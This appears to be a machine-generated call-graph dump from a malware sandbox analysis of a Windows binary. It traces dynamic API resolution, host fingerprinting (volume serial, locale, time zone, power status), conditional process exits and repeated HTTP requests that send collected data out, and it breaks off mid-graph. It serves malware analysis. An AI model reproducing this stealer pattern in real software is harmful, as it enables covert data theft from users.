API calls 14372->14373 14374 ba3be5 14373->14374 14375 ba45c0 2 API calls 14374->14375 14376 ba3bfe 14375->14376 14377 ba45c0 2 API calls 14376->14377 14378 ba3c17 14377->14378 14379 ba45c0 2 API calls 14378->14379 14380 ba3c30 14379->14380 14381 ba45c0 2 API calls 14380->14381 14382 ba3c49 14381->14382 14383 ba45c0 2 API calls 14382->14383 14384 ba3c62 14383->14384 14385 ba45c0 2 API calls 14384->14385 14386 ba3c7b 14385->14386 14387 ba45c0 2 API calls 14386->14387 14388 ba3c94 14387->14388 14389 ba45c0 2 API calls 14388->14389 14390 ba3cad 14389->14390 14391 ba45c0 2 API calls 14390->14391 14392 ba3cc6 14391->14392 14393 ba45c0 2 API calls 14392->14393 14394 ba3cdf 14393->14394 14395 ba45c0 2 API calls 14394->14395 14396 ba3cf8 14395->14396 14397 ba45c0 2 API calls 14396->14397 14398 ba3d11 14397->14398 14399 ba45c0 2 API calls 14398->14399 14400 ba3d2a 14399->14400 14401 ba45c0 2 API calls 14400->14401 14402 ba3d43 14401->14402 14403 ba45c0 2 API calls 14402->14403 14404 ba3d5c 14403->14404 14405 ba45c0 2 API calls 14404->14405 14406 ba3d75 14405->14406 14407 ba45c0 2 API calls 14406->14407 14408 ba3d8e 14407->14408 14409 ba45c0 2 API calls 14408->14409 14410 ba3da7 14409->14410 14411 ba45c0 2 API calls 14410->14411 14412 ba3dc0 14411->14412 14413 ba45c0 2 API calls 14412->14413 14414 ba3dd9 14413->14414 14415 ba45c0 2 API calls 14414->14415 14416 ba3df2 14415->14416 14417 ba45c0 2 API calls 14416->14417 14418 ba3e0b 14417->14418 14419 ba45c0 2 API calls 14418->14419 14420 ba3e24 14419->14420 14421 ba45c0 2 API calls 14420->14421 14422 ba3e3d 14421->14422 14423 ba45c0 2 API calls 14422->14423 14424 ba3e56 14423->14424 14425 ba45c0 2 API calls 14424->14425 14426 ba3e6f 14425->14426 14427 ba45c0 2 API calls 14426->14427 14428 ba3e88 14427->14428 14429 ba45c0 2 API calls 14428->14429 14430 ba3ea1 14429->14430 14431 ba45c0 2 API calls 14430->14431 14432 ba3eba 14431->14432 14433 ba45c0 2 API calls 14432->14433 14434 ba3ed3 14433->14434 14435 ba45c0 2 API calls 14434->14435 14436 ba3eec 14435->14436 14437 ba45c0 2 API calls 14436->14437 14438 ba3f05 14437->14438 14439 ba45c0 2 API calls 14438->14439 14440 ba3f1e 14439->14440 14441 ba45c0 2 API calls 14440->14441 14442 ba3f37 14441->14442 14443 ba45c0 2 API calls 14442->14443 14444 ba3f50 14443->14444 14445 ba45c0 2 API calls 14444->14445 14446 ba3f69 14445->14446 14447 ba45c0 2 API calls 14446->14447 14448 ba3f82 14447->14448 14449 ba45c0 2 API calls 14448->14449 14450 ba3f9b 14449->14450 14451 ba45c0 2 API calls 14450->14451 14452 ba3fb4 14451->14452 14453 ba45c0 2 API calls 14452->14453 14454 ba3fcd 14453->14454 14455 ba45c0 2 API calls 14454->14455 14456 ba3fe6 14455->14456 14457 ba45c0 2 API calls 14456->14457 14458 ba3fff 14457->14458 14459 ba45c0 2 API calls 14458->14459 14460 ba4018 14459->14460 14461 ba45c0 2 API calls 14460->14461 14462 ba4031 14461->14462 14463 ba45c0 2 API calls 14462->14463 14464 ba404a 14463->14464 14465 ba45c0 2 API calls 14464->14465 14466 ba4063 14465->14466 14467 ba45c0 2 API calls 14466->14467 14468 ba407c 14467->14468 14469 ba45c0 2 API calls 14468->14469 14470 ba4095 14469->14470 14471 ba45c0 2 API calls 14470->14471 14472 ba40ae 14471->14472 14473 ba45c0 2 API calls 14472->14473 14474 ba40c7 14473->14474 14475 ba45c0 2 API calls 14474->14475 14476 ba40e0 14475->14476 14477 ba45c0 2 API calls 14476->14477 14478 ba40f9 14477->14478 14479 ba45c0 2 API calls 14478->14479 14480 ba4112 14479->14480 14481 ba45c0 2 API calls 14480->14481 14482 ba412b 14481->14482 14483 ba45c0 2 API calls 14482->14483 14484 ba4144 14483->14484 14485 ba45c0 2 API calls 14484->14485 14486 ba415d 14485->14486 14487 ba45c0 2 API calls 14486->14487 14488 ba4176 14487->14488 14489 ba45c0 2 API calls 14488->14489 14490 ba418f 14489->14490 14491 ba45c0 2 API calls 14490->14491 14492 ba41a8 14491->14492 14493 ba45c0 2 API calls 14492->14493 14494 ba41c1 14493->14494 14495 ba45c0 2 API calls 14494->14495 14496 ba41da 14495->14496 14497 ba45c0 2 API calls 14496->14497 14498 ba41f3 14497->14498 14499 ba45c0 2 API calls 14498->14499 14500 ba420c 14499->14500 14501 ba45c0 2 API calls 14500->14501 14502 ba4225 14501->14502 14503 ba45c0 2 API calls 14502->14503 14504 ba423e 14503->14504 14505 ba45c0 2 API calls 14504->14505 14506 ba4257 14505->14506 14507 ba45c0 2 API calls 14506->14507 14508 ba4270 14507->14508 14509 ba45c0 2 API calls 14508->14509 14510 ba4289 14509->14510 14511 ba45c0 2 API calls 14510->14511 14512 ba42a2 14511->14512 14513 ba45c0 2 API calls 14512->14513 14514 ba42bb 14513->14514 14515 ba45c0 2 API calls 14514->14515 14516 ba42d4 14515->14516 14517 ba45c0 2 API calls 14516->14517 14518 ba42ed 14517->14518 14519 ba45c0 2 API calls 14518->14519 14520 ba4306 14519->14520 14521 ba45c0 2 API calls 14520->14521 14522 ba431f 14521->14522 14523 ba45c0 2 API calls 14522->14523 14524 ba4338 14523->14524 14525 ba45c0 2 API calls 14524->14525 14526 ba4351 14525->14526 14527 ba45c0 2 API calls 14526->14527 14528 ba436a 14527->14528 14529 ba45c0 2 API calls 14528->14529 14530 ba4383 14529->14530 14531 ba45c0 2 API calls 14530->14531 14532 ba439c 14531->14532 14533 ba45c0 2 API calls 14532->14533 14534 ba43b5 14533->14534 14535 ba45c0 2 API calls 14534->14535 14536 ba43ce 14535->14536 14537 ba45c0 2 API calls 14536->14537 14538 ba43e7 14537->14538 14539 ba45c0 2 API calls 14538->14539 14540 ba4400 14539->14540 14541 ba45c0 2 API calls 14540->14541 14542 ba4419 14541->14542 14543 ba45c0 2 API calls 14542->14543 14544 ba4432 14543->14544 14545 ba45c0 2 API calls 14544->14545 14546 ba444b 14545->14546 14547 ba45c0 2 API calls 14546->14547 14548 ba4464 14547->14548 14549 ba45c0 2 API calls 14548->14549 14550 ba447d 14549->14550 14551 ba45c0 2 API calls 14550->14551 14552 ba4496 14551->14552 14553 ba45c0 2 API calls 14552->14553 14554 ba44af 14553->14554 14555 ba45c0 2 API calls 14554->14555 14556 ba44c8 14555->14556 14557 ba45c0 2 API calls 14556->14557 14558 ba44e1 14557->14558 14559 ba45c0 2 API calls 14558->14559 14560 ba44fa 14559->14560 14561 ba45c0 2 API calls 14560->14561 14562 ba4513 14561->14562 14563 ba45c0 2 API calls 14562->14563 14564 ba452c 14563->14564 14565 ba45c0 2 API calls 14564->14565 14566 ba4545 14565->14566 14567 ba45c0 2 API calls 14566->14567 14568 ba455e 14567->14568 14569 ba45c0 2 API calls 14568->14569 14570 ba4577 14569->14570 14571 ba45c0 2 API calls 14570->14571 14572 ba4590 14571->14572 14573 ba45c0 2 API calls 14572->14573 14574 ba45a9 14573->14574 14575 bb9c10 14574->14575 14576 bb9c20 43 API calls 14575->14576 14577 bba036 8 API calls 14575->14577 14576->14577 14578 bba0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14577->14578 14579 bba146 14577->14579 14578->14579 14580 bba153 8 API calls 14579->14580 14581 bba216 14579->14581 14580->14581 14582 bba298 14581->14582 14583 bba21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14581->14583 14584 bba337 14582->14584 14585 bba2a5 6 API calls 14582->14585 14583->14582 14586 bba41f 14584->14586 14587 bba344 9 API calls 14584->14587 14585->14584 14588 bba428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14586->14588 14589 bba4a2 14586->14589 14587->14586 14588->14589 14590 bba4ab GetProcAddress GetProcAddress 14589->14590 14591 bba4dc 14589->14591 14590->14591 14592 bba515 14591->14592 14593 bba4e5 GetProcAddress GetProcAddress 14591->14593 14594 bba612 14592->14594 14595 bba522 10 API calls 14592->14595 14593->14592 14596 bba61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14594->14596 14597 bba67d 14594->14597 14595->14594 14596->14597 14598 bba69e 14597->14598 14599 bba686 GetProcAddress 14597->14599 14600 bb5ca3 14598->14600 14601 bba6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14598->14601 14599->14598 14602 ba1590 14600->14602 14601->14600 15723 ba1670 14602->15723 14605 bba7a0 lstrcpy 14606 ba15b5 14605->14606 14607 bba7a0 lstrcpy 14606->14607 14608 ba15c7 14607->14608 14609 bba7a0 lstrcpy 14608->14609 14610 ba15d9 14609->14610 14611 bba7a0 lstrcpy 14610->14611 14612 ba1663 14611->14612 14613 bb5510 14612->14613 14614 bb5521 14613->14614 14615 bba820 2 API calls 14614->14615 14616 bb552e 14615->14616 14617 bba820 2 API calls 14616->14617 14618 bb553b 14617->14618 14619 bba820 2 API calls 14618->14619 14620 bb5548 14619->14620 14621 bba740 lstrcpy 14620->14621 14622 bb5555 14621->14622 14623 bba740 lstrcpy 14622->14623 14624 bb5562 14623->14624 14625 bba740 lstrcpy 14624->14625 14626 bb556f 14625->14626 14627 bba740 lstrcpy 14626->14627 14647 bb557c 14627->14647 14628 bb5643 StrCmpCA 14628->14647 14629 bb56a0 StrCmpCA 14630 bb57dc 14629->14630 14629->14647 14631 bba8a0 lstrcpy 14630->14631 14632 bb57e8 14631->14632 14633 bba820 2 API calls 14632->14633 14635 bb57f6 14633->14635 14634 bba820 lstrlen lstrcpy 14634->14647 14637 bba820 2 API calls 14635->14637 14636 bb5856 StrCmpCA 14638 bb5991 14636->14638 14636->14647 14642 bb5805 14637->14642 14641 bba8a0 lstrcpy 14638->14641 14639 bba740 lstrcpy 14639->14647 14640 bba7a0 lstrcpy 14640->14647 14643 bb599d 14641->14643 14644 ba1670 lstrcpy 14642->14644 14646 bba820 2 API calls 14643->14646 14667 bb5811 14644->14667 14645 ba1590 lstrcpy 14645->14647 14648 bb59ab 14646->14648 14647->14628 14647->14629 14647->14634 14647->14636 14647->14639 14647->14640 14647->14645 14649 bb5a0b StrCmpCA 14647->14649 14650 bb51f0 20 API calls 14647->14650 14660 bb52c0 25 API calls 14647->14660 14662 bb578a StrCmpCA 14647->14662 14664 bba8a0 lstrcpy 14647->14664 14666 bb593f StrCmpCA 14647->14666 14651 bba820 2 API calls 14648->14651 14652 bb5a28 14649->14652 14653 bb5a16 Sleep 14649->14653 14650->14647 14654 bb59ba 14651->14654 14655 bba8a0 lstrcpy 14652->14655 14653->14647 14656 ba1670 lstrcpy 14654->14656 14657 bb5a34 14655->14657 14656->14667 14658 bba820 2 API calls 14657->14658 14659 bb5a43 14658->14659 14661 bba820 2 API calls 14659->14661 14660->14647 14663 bb5a52 14661->14663 14662->14647 14665 ba1670 lstrcpy 14663->14665 14664->14647 14665->14667 14666->14647 14667->13720 14669 bb754c 14668->14669 14670 bb7553 GetVolumeInformationA 14668->14670 14669->14670 14674 bb7591 14670->14674 14671 bb75fc GetProcessHeap RtlAllocateHeap 14672 bb7619 14671->14672 14673 bb7628 wsprintfA 14671->14673 14675 bba740 lstrcpy 14672->14675 14676 bba740 lstrcpy 14673->14676 14674->14671 14677 bb5da7 14675->14677 14676->14677 14677->13741 14679 bba7a0 lstrcpy 14678->14679 14680 ba4899 14679->14680 15732 ba47b0 14680->15732 14682 ba48a5 14683 bba740 lstrcpy 14682->14683 14684 ba48d7 14683->14684 14685 bba740 lstrcpy 14684->14685 14686 ba48e4 14685->14686 14687 bba740 lstrcpy 14686->14687 14688 ba48f1 14687->14688 14689 bba740 lstrcpy 14688->14689 14690 ba48fe 14689->14690 14691 bba740 lstrcpy 14690->14691 14692 ba490b InternetOpenA StrCmpCA 14691->14692 14693 ba4944 14692->14693 14694 ba4ecb InternetCloseHandle 14693->14694 15738 bb8b60 14693->15738 14696 ba4ee8 14694->14696 15753 ba9ac0 CryptStringToBinaryA 14696->15753 14697 ba4963 15746 bba920 14697->15746 14700 ba4976 14702 bba8a0 lstrcpy 14700->14702 14708 ba497f 14702->14708 14703 bba820 2 API calls 14704 ba4f05 14703->14704 14706 bba9b0 4 API calls 14704->14706 14705 ba4f27 ctype 14710 bba7a0 lstrcpy 14705->14710 14707 ba4f1b 14706->14707 14709 bba8a0 lstrcpy 14707->14709 14711 bba9b0 4 API calls 14708->14711 14709->14705 14722 ba4f57 14710->14722 14712 ba49a9 14711->14712 14713 bba8a0 lstrcpy 14712->14713 14714 ba49b2 14713->14714 14715 bba9b0 4 API calls 14714->14715 14716 ba49d1 14715->14716 14717 bba8a0 lstrcpy 14716->14717 14718 ba49da 14717->14718 14719 bba920 3 API calls 14718->14719 14720 ba49f8 14719->14720 14721 bba8a0 lstrcpy 14720->14721 14723 ba4a01 14721->14723 14722->13744 14724 bba9b0 4 API calls 14723->14724 14725 ba4a20 14724->14725 14726 bba8a0 lstrcpy 14725->14726 14727 ba4a29 14726->14727 14728 bba9b0 4 API calls 14727->14728 14729 ba4a48 14728->14729 14730 bba8a0 lstrcpy 14729->14730 14731 ba4a51 14730->14731 14732 bba9b0 4 API calls 14731->14732 14733 ba4a7d 14732->14733 14734 bba920 3 API calls 14733->14734 14735 ba4a84 14734->14735 14736 bba8a0 lstrcpy 14735->14736 14737 ba4a8d 14736->14737 14738 ba4aa3 InternetConnectA 14737->14738 14738->14694 14739 ba4ad3 HttpOpenRequestA 14738->14739 14741 ba4b28 14739->14741 14742 ba4ebe InternetCloseHandle 14739->14742 14743 bba9b0 4 API calls 14741->14743 14742->14694 14744 ba4b3c 14743->14744 14745 bba8a0 lstrcpy 14744->14745 14746 ba4b45 14745->14746 14747 bba920 3 API calls 14746->14747 14748 ba4b63 14747->14748 14749 bba8a0 lstrcpy 14748->14749 14750 ba4b6c 14749->14750 14751 bba9b0 4 API calls 14750->14751 14752 ba4b8b 14751->14752 14753 bba8a0 lstrcpy 14752->14753 14754 ba4b94 14753->14754 14755 bba9b0 4 API calls 14754->14755 14756 ba4bb5 14755->14756 14757 bba8a0 lstrcpy 14756->14757 14758 ba4bbe 14757->14758 14759 bba9b0 4 API calls 14758->14759 14760 ba4bde 14759->14760 14761 bba8a0 lstrcpy 14760->14761 14762 ba4be7 14761->14762 14763 bba9b0 4 API calls 14762->14763 14764 ba4c06 14763->14764 14765 bba8a0 lstrcpy 14764->14765 14766 ba4c0f 14765->14766 14767 bba920 3 API calls 14766->14767 14768 ba4c2d 14767->14768 14769 bba8a0 lstrcpy 14768->14769 14770 ba4c36 14769->14770 14771 bba9b0 4 API calls 14770->14771 14772 ba4c55 14771->14772 14773 bba8a0 lstrcpy 14772->14773 14774 ba4c5e 14773->14774 14775 bba9b0 4 API calls 14774->14775 14776 ba4c7d 14775->14776 14777 bba8a0 lstrcpy 14776->14777 14778 ba4c86 14777->14778 14779 bba920 3 API calls 14778->14779 14780 ba4ca4 14779->14780 14781 bba8a0 lstrcpy 14780->14781 14782 ba4cad 14781->14782 14783 bba9b0 4 API calls 14782->14783 14784 ba4ccc 14783->14784 14785 bba8a0 lstrcpy 14784->14785 14786 ba4cd5 14785->14786 14787 bba9b0 4 API calls 14786->14787 14788 ba4cf6 14787->14788 14789 bba8a0 lstrcpy 14788->14789 14790 ba4cff 14789->14790 14791 bba9b0 4 API calls 14790->14791 14792 ba4d1f 14791->14792 14793 bba8a0 lstrcpy 14792->14793 14794 ba4d28 14793->14794 14795 bba9b0 4 API calls 14794->14795 14796 ba4d47 14795->14796 14797 bba8a0 lstrcpy 14796->14797 14798 ba4d50 14797->14798 14799 bba920 3 API calls 14798->14799 14800 ba4d6e 14799->14800 14801 bba8a0 lstrcpy 14800->14801 14802 ba4d77 14801->14802 14803 bba740 lstrcpy 14802->14803 14804 ba4d92 14803->14804 14805 bba920 3 API calls 14804->14805 14806 ba4db3 14805->14806 14807 bba920 3 API calls 14806->14807 14808 ba4dba 14807->14808 14809 bba8a0 lstrcpy 14808->14809 14810 ba4dc6 14809->14810 14811 ba4de7 lstrlen 14810->14811 14812 ba4dfa 14811->14812 14813 ba4e03 lstrlen 14812->14813 15752 bbaad0 14813->15752 14815 ba4e13 HttpSendRequestA 14816 ba4e32 InternetReadFile 14815->14816 14817 ba4e67 InternetCloseHandle 14816->14817 14822 ba4e5e 14816->14822 14819 bba800 14817->14819 14819->14742 14820 bba9b0 4 API calls 14820->14822 14821 bba8a0 lstrcpy 14821->14822 14822->14816 14822->14817 14822->14820 14822->14821 15759 bbaad0 14823->15759 14825 bb17c4 StrCmpCA 14826 bb17cf ExitProcess 14825->14826 14837 bb17d7 14825->14837 14827 bb19c2 14827->13746 14828 bb187f StrCmpCA 14828->14837 14829 bb185d StrCmpCA 14829->14837 14830 bb1913 StrCmpCA 14830->14837 14831 bb1932 StrCmpCA 14831->14837 14832 bb18f1 StrCmpCA 14832->14837 14833 bb1951 StrCmpCA 14833->14837 14834 bb1970 StrCmpCA 14834->14837 14835 bb18cf StrCmpCA 14835->14837 14836 bb18ad StrCmpCA 14836->14837 14837->14827 14837->14828 14837->14829 14837->14830 14837->14831 14837->14832 14837->14833 14837->14834 14837->14835 14837->14836 14838 bba820 lstrlen lstrcpy 14837->14838 14838->14837 14840 bba7a0 lstrcpy 14839->14840 14841 ba5979 14840->14841 14842 ba47b0 2 API calls 14841->14842 14843 ba5985 14842->14843 14844 bba740 lstrcpy 14843->14844 14845 ba59ba 14844->14845 14846 bba740 lstrcpy 14845->14846 14847 ba59c7 14846->14847 14848 bba740 lstrcpy 14847->14848 14849 ba59d4 14848->14849 14850 bba740 lstrcpy 14849->14850 14851 ba59e1 14850->14851 14852 bba740 lstrcpy 14851->14852 14853 ba59ee InternetOpenA StrCmpCA 14852->14853 14854 ba5a1d 14853->14854 14855 ba5fc3 InternetCloseHandle 14854->14855 14856 bb8b60 3 API calls 14854->14856 14857 ba5fe0 14855->14857 14858 ba5a3c 14856->14858 14860 ba9ac0 4 API calls 14857->14860 14859 bba920 3 API calls 14858->14859 14861 ba5a4f 14859->14861 14862 ba5fe6 14860->14862 14863 bba8a0 lstrcpy 14861->14863 14864 bba820 2 API calls 14862->14864 14866 ba601f ctype 14862->14866 14868 ba5a58 14863->14868 14865 ba5ffd 14864->14865 14867 bba9b0 4 API calls 14865->14867 14870 bba7a0 lstrcpy 14866->14870 14869 ba6013 14867->14869 14872 bba9b0 4 API calls 14868->14872 14871 bba8a0 lstrcpy 14869->14871 14880 ba604f 14870->14880 14871->14866 14873 ba5a82 14872->14873 14874 bba8a0 lstrcpy 14873->14874 14875 ba5a8b 14874->14875 14876 bba9b0 4 API calls 14875->14876 14877 ba5aaa 14876->14877 14878 bba8a0 lstrcpy 14877->14878 14879 ba5ab3 14878->14879 14881 bba920 3 API calls 14879->14881 14880->13752 14882 ba5ad1 14881->14882 14883 bba8a0 lstrcpy 14882->14883 14884 ba5ada 14883->14884 14885 bba9b0 4 API calls 14884->14885 14886 ba5af9 14885->14886 14887 bba8a0 lstrcpy 14886->14887 14888 ba5b02 14887->14888 14889 bba9b0 4 API calls 14888->14889 14890 ba5b21 14889->14890 14891 bba8a0 lstrcpy 14890->14891 14892 ba5b2a 14891->14892 14893 bba9b0 4 API calls 14892->14893 14894 ba5b56 14893->14894 14895 bba920 3 API calls 14894->14895 14896 ba5b5d 14895->14896 14897 bba8a0 lstrcpy 14896->14897 14898 ba5b66 14897->14898 14899 ba5b7c InternetConnectA 14898->14899 14899->14855 14900 ba5bac HttpOpenRequestA 14899->14900 14902 ba5c0b 14900->14902 14903 ba5fb6 InternetCloseHandle 14900->14903 14904 bba9b0 4 API calls 14902->14904 14903->14855 14905 ba5c1f 14904->14905 14906 bba8a0 lstrcpy 14905->14906 14907 ba5c28 14906->14907 14908 bba920 3 API calls 14907->14908 14909 ba5c46 14908->14909 14910 bba8a0 lstrcpy 14909->14910 14911 ba5c4f 14910->14911 14912 bba9b0 4 API calls 14911->14912 14913 ba5c6e 14912->14913 14914 bba8a0 lstrcpy 14913->14914 14915 ba5c77 14914->14915 14916 bba9b0 4 API calls 14915->14916 14917 ba5c98 14916->14917 14918 bba8a0 lstrcpy 14917->14918 14919 ba5ca1 14918->14919 14920 bba9b0 4 API calls 14919->14920 14921 ba5cc1 14920->14921 14922 bba8a0 lstrcpy 14921->14922 14923 ba5cca 14922->14923 14924 bba9b0 4 API calls 14923->14924 14925 ba5ce9 14924->14925 14926 bba8a0 lstrcpy 14925->14926 14927 ba5cf2 14926->14927 14928 bba920 3 API calls 14927->14928 14929 ba5d10 14928->14929 14930 bba8a0 lstrcpy 14929->14930 14931 ba5d19 14930->14931 14932 bba9b0 4 API calls 14931->14932 14933 ba5d38 14932->14933 14934 bba8a0 lstrcpy 14933->14934 14935 ba5d41 14934->14935 14936 bba9b0 4 API calls 14935->14936 14937 ba5d60 14936->14937 14938 bba8a0 lstrcpy 14937->14938 14939 ba5d69 14938->14939 14940 bba920 3 API calls 14939->14940 14941 ba5d87 14940->14941 14942 bba8a0 lstrcpy 14941->14942 14943 ba5d90 14942->14943 14944 bba9b0 4 API calls 14943->14944 14945 ba5daf 14944->14945 14946 bba8a0 lstrcpy 14945->14946 14947 ba5db8 14946->14947 14948 bba9b0 4 API calls 14947->14948 14949 ba5dd9 14948->14949 14950 bba8a0 lstrcpy 14949->14950 14951 ba5de2 14950->14951 14952 bba9b0 4 API calls 14951->14952 14953 ba5e02 14952->14953 14954 bba8a0 lstrcpy 14953->14954 14955 ba5e0b 14954->14955 14956 bba9b0 4 API calls 14955->14956 14957 ba5e2a 14956->14957 14958 bba8a0 lstrcpy 14957->14958 14959 ba5e33 14958->14959 14960 bba920 3 API calls 14959->14960 14961 ba5e54 14960->14961 14962 bba8a0 lstrcpy 14961->14962 14963 ba5e5d 14962->14963 14964 ba5e70 lstrlen 14963->14964 15760 bbaad0 14964->15760 14966 ba5e81 lstrlen GetProcessHeap RtlAllocateHeap 15761 bbaad0 14966->15761 14968 ba5eae lstrlen 14969 ba5ebe 14968->14969 14970 ba5ed7 lstrlen 14969->14970 14971 ba5ee7 14970->14971 14972 ba5ef0 lstrlen 14971->14972 14973 ba5f03 14972->14973 14974 ba5f1a lstrlen 14973->14974 15762 bbaad0 14974->15762 14976 ba5f2a HttpSendRequestA 14977 ba5f35 InternetReadFile 14976->14977 14978 ba5f6a InternetCloseHandle 14977->14978 14982 ba5f61 14977->14982 14978->14903 14980 bba9b0 4 API calls 14980->14982 14981 bba8a0 lstrcpy 14981->14982 14982->14977 14982->14978 14982->14980 14982->14981 14985 bb1077 14983->14985 14984 bb1151 14984->13754 14985->14984 14986 bba820 lstrlen lstrcpy 14985->14986 14986->14985 14988 bb0db7 14987->14988 14989 bb0f17 14988->14989 14990 bb0e27 StrCmpCA 14988->14990 14991 bb0e67 StrCmpCA 14988->14991 14992 bb0ea4 StrCmpCA 14988->14992 14993 bba820 lstrlen lstrcpy 14988->14993 14989->13762 14990->14988 14991->14988 14992->14988 14993->14988 14997 bb0f67 14994->14997 14995 bb1044 14995->13770 14996 bb0fb2 StrCmpCA 14996->14997 14997->14995 14997->14996 14998 bba820 lstrlen lstrcpy 14997->14998 14998->14997 15000 bba740 lstrcpy 14999->15000 15001 bb1a26 15000->15001 15002 bba9b0 4 API calls 15001->15002 15003 bb1a37 15002->15003 15004 bba8a0 lstrcpy 15003->15004 15005 bb1a40 15004->15005 15006 bba9b0 4 API calls 15005->15006 15007 bb1a5b 15006->15007 15008 bba8a0 lstrcpy 15007->15008 15009 bb1a64 15008->15009 15010 bba9b0 4 API calls 15009->15010 15011 bb1a7d 15010->15011 15012 bba8a0 lstrcpy 15011->15012 15013 bb1a86 15012->15013 15014 bba9b0 4 API calls 15013->15014 15015 bb1aa1 15014->15015 15016 bba8a0 lstrcpy 15015->15016 15017 bb1aaa 15016->15017 15018 bba9b0 4 API calls 15017->15018 15019 bb1ac3 15018->15019 15020 bba8a0 lstrcpy 15019->15020 15021 bb1acc 15020->15021 15022 bba9b0 4 API calls 15021->15022 15023 bb1ae7 15022->15023 15024 bba8a0 lstrcpy 15023->15024 15025 bb1af0 15024->15025 15026 bba9b0 4 API calls 15025->15026 15027 bb1b09 15026->15027 15028 bba8a0 lstrcpy 15027->15028 15029 bb1b12 15028->15029 15030 bba9b0 4 API calls 15029->15030 15031 bb1b2d 15030->15031 15032 bba8a0 lstrcpy 15031->15032 15033 bb1b36 15032->15033 15034 bba9b0 4 API calls 15033->15034 15035 bb1b4f 15034->15035 15036 bba8a0 lstrcpy 15035->15036 15037 bb1b58 15036->15037 15038 bba9b0 4 API calls 15037->15038 15039 bb1b76 15038->15039 15040 bba8a0 lstrcpy 15039->15040 15041 bb1b7f 15040->15041 15042 bb7500 6 API calls 15041->15042 15043 bb1b96 15042->15043 15044 bba920 3 API calls 15043->15044 15045 bb1ba9 15044->15045 15046 bba8a0 lstrcpy 15045->15046 15047 bb1bb2 15046->15047 15048 bba9b0 4 API calls 15047->15048 15049 bb1bdc 15048->15049 15050 bba8a0 lstrcpy 15049->15050 15051 bb1be5 15050->15051 15052 bba9b0 4 API calls 15051->15052 15053 bb1c05 15052->15053 15054 bba8a0 lstrcpy 15053->15054 15055 bb1c0e 15054->15055 15763 bb7690 GetProcessHeap RtlAllocateHeap 15055->15763 15058 bba9b0 4 API calls 15059 bb1c2e 15058->15059 15060 bba8a0 lstrcpy 15059->15060 15061 bb1c37 15060->15061 15062 bba9b0 4 API calls 15061->15062 15063 bb1c56 15062->15063 15064 bba8a0 lstrcpy 15063->15064 15065 bb1c5f 15064->15065 15066 bba9b0 4 API calls 15065->15066 15067 bb1c80 15066->15067 15068 bba8a0 lstrcpy 15067->15068 15069 bb1c89 15068->15069 15770 bb77c0 GetCurrentProcess IsWow64Process 15069->15770 15072 bba9b0 4 API calls 15073 bb1ca9 15072->15073 15074 bba8a0 lstrcpy 15073->15074 15075 bb1cb2 15074->15075 15076 bba9b0 4 API calls 15075->15076 15077 bb1cd1 15076->15077 15078 bba8a0 lstrcpy 15077->15078 15079 bb1cda 15078->15079 15080 bba9b0 4 API calls 15079->15080 15081 bb1cfb 15080->15081 15082 bba8a0 lstrcpy 15081->15082 15083 bb1d04 15082->15083 15084 bb7850 3 API calls 15083->15084 15085 bb1d14 15084->15085 15086 bba9b0 4 API calls 15085->15086 15087 bb1d24 15086->15087 15088 bba8a0 lstrcpy 15087->15088 15089 bb1d2d 15088->15089 15090 bba9b0 4 API calls 15089->15090 15091 bb1d4c 15090->15091 15092 bba8a0 lstrcpy 15091->15092 15093 bb1d55 15092->15093 15094 bba9b0 4 API calls 15093->15094 15095 bb1d75 15094->15095 15096 bba8a0 lstrcpy 15095->15096 15097 bb1d7e 15096->15097 15098 bb78e0 3 API calls 15097->15098 15099 bb1d8e 15098->15099 15100 bba9b0 4 API calls 15099->15100 15101 bb1d9e 15100->15101 15102 bba8a0 lstrcpy 15101->15102 15103 bb1da7 15102->15103 15104 bba9b0 4 API calls 15103->15104 15105 bb1dc6 15104->15105 15106 bba8a0 lstrcpy 15105->15106 15107 bb1dcf 15106->15107 15108 bba9b0 4 API calls 15107->15108 15109 bb1df0 15108->15109 15110 bba8a0 lstrcpy 15109->15110 15111 bb1df9 15110->15111 15772 bb7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15111->15772 15114 bba9b0 4 API calls 15115 bb1e19 15114->15115 15116 bba8a0 lstrcpy 15115->15116 15117 bb1e22 15116->15117 15118 bba9b0 4 API calls 15117->15118 15119 bb1e41 15118->15119 15120 bba8a0 lstrcpy 15119->15120 15121 bb1e4a 15120->15121 15122 bba9b0 4 API calls 15121->15122 15123 bb1e6b 15122->15123 15124 bba8a0 lstrcpy 15123->15124 15125 bb1e74 15124->15125 15774 bb7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15125->15774 15128 bba9b0 4 API calls 15129 bb1e94 15128->15129 15130 bba8a0 lstrcpy 15129->15130 15131 bb1e9d 15130->15131 15132 bba9b0 4 API calls 15131->15132 15133 bb1ebc 15132->15133 15134 bba8a0 lstrcpy 15133->15134 15135 bb1ec5 15134->15135 15136 bba9b0 4 API calls 15135->15136 15137 bb1ee5 15136->15137 15138 bba8a0 lstrcpy 15137->15138 15139 bb1eee 15138->15139 15777 bb7b00 GetUserDefaultLocaleName 15139->15777 15142 bba9b0 4 API calls 15143 bb1f0e 15142->15143 15144 bba8a0 lstrcpy 15143->15144 15145 bb1f17 15144->15145 15146 bba9b0 4 API calls 15145->15146 15147 bb1f36 15146->15147 15148 bba8a0 lstrcpy 15147->15148 15149 bb1f3f 15148->15149 15150 bba9b0 4 API calls 15149->15150 15151 bb1f60 15150->15151 15152 bba8a0 lstrcpy 15151->15152 15153 bb1f69 15152->15153 15781 bb7b90 15153->15781 15155 bb1f80 15156 bba920 3 API calls 15155->15156 15157 bb1f93 15156->15157 15158 bba8a0 lstrcpy 15157->15158 15159 bb1f9c 15158->15159 15160 bba9b0 4 API calls 15159->15160 15161 bb1fc6 15160->15161 15162 bba8a0 lstrcpy 15161->15162 15163 bb1fcf 15162->15163 15164 bba9b0 4 API calls 15163->15164 15165 bb1fef 15164->15165 15166 bba8a0 lstrcpy 15165->15166 15167 bb1ff8 15166->15167 15793 bb7d80 GetSystemPowerStatus 15167->15793 15170 bba9b0 4 API calls 15171 bb2018 15170->15171 15172 bba8a0 lstrcpy 15171->15172 15173 bb2021 15172->15173 15174 bba9b0 4 API calls 15173->15174 15175 bb2040 15174->15175 15176 bba8a0 lstrcpy 15175->15176 15177 bb2049 15176->15177 15178 bba9b0 4 API calls 15177->15178 15179 bb206a 15178->15179 15180 